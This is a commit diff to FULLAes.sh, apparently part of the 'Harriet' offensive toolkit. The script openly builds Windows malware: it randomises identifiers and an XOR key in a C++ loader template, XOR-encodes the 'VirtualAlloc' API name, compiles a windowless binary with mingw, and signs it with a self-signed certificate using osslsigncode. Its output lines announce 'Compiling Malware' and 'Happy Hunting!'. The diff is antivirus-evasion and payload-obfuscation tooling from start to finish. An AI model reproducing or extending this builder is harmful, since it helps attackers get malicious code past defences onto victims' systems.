assume-breach 2 жил өмнө
parent
commit
7b44db533e

+ 7 - 13
Harriet/Harriet/FULLAes/FULLAes.sh

@@ -84,11 +84,11 @@ cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
 Random6=$(cat shell.txt)
 sed -i "s/Random6/$Random6/g" Harriet/FULLAes/Resources/template.cpp
 
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-4} | head -n 1 > shell.txt
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
 Random7=$(cat shell.txt)
 sed -i "s/Random7/$Random7/g" Harriet/FULLAes/Resources/template.cpp
 
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-2} | head -n 1 > shell.txt
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
 Random8=$(cat shell.txt)
 sed -i "s/Random8/$Random8/g" Harriet/FULLAes/Resources/template.cpp
 
@@ -103,13 +103,13 @@ RandomA=$(cat shell.txt)
 sed -i "s/RandomA/$RandomA/g" Harriet/FULLAes/Resources/template.cpp
 
 #XOR KEY VALUE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-15} | head -n 1 > shell.txt
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-16} | head -n 1 > shell.txt
 XOR_KEY=$(cat shell.txt)
 sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/FULLAes/Resources/template.cpp
 sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/FULLAes/Resources/xor.py
 
 #XOR KEY VARIABLE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-17} | head -n 1 > shell.txt
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-18} | head -n 1 > shell.txt
 XOR_VARIABLE=$(cat shell.txt)
 sed -i "s/XOR_VARIABLE/$XOR_VARIABLE/g" Harriet/FULLAes/Resources/template.cpp
 rm shell.txt
@@ -118,22 +118,19 @@ rm shell.txt
 echo VirtualAlloc > virt.txt
 python3 Harriet/FULLAes/Resources/xor.py virt.txt > virtalloc.txt
 virt=$(cat virtalloc.txt)
-virt2="${virt::-8}" 
+virt2="${virt::-9}" 
 sed -i "s/VIRALO/$virt2/g" Harriet/FULLAes/Resources/template.cpp 
 rm virt*
 
 echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -o $MALWARE Harriet/FULLAes/Resources/template.cpp -fpermissive -Wno-narrowing -O2>/dev/null 2>&1
+x86_64-w64-mingw32-g++ -o $MALWARE Harriet/FULLAes/Resources/template.cpp -fpermissive -Wno-narrowing Harriet/Resources/resources.res -mwindows -O2 >/dev/null 2>&1
 echo ""
 sleep 2
 rm shell*
 echo -e ${yellow}"***Malware Compiled***"${clear}
 echo ""
 sleep 2
-echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-echo ""
-sleep 2
-echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo -e ${yellow}"+++Adding Self Signed Cert+++"${clear}
 echo ""
 sleep 2
 # Set static paths for certificate, private key, executable, and signed output
@@ -165,6 +162,3 @@ osslsigncode sign -certs "$CERTIFICATE_PATH" -key "$KEY_PATH" -in "$MALWARE" -ou
 mv signed$MALWARE $MALWARE
 echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
 echo ""
-
-
-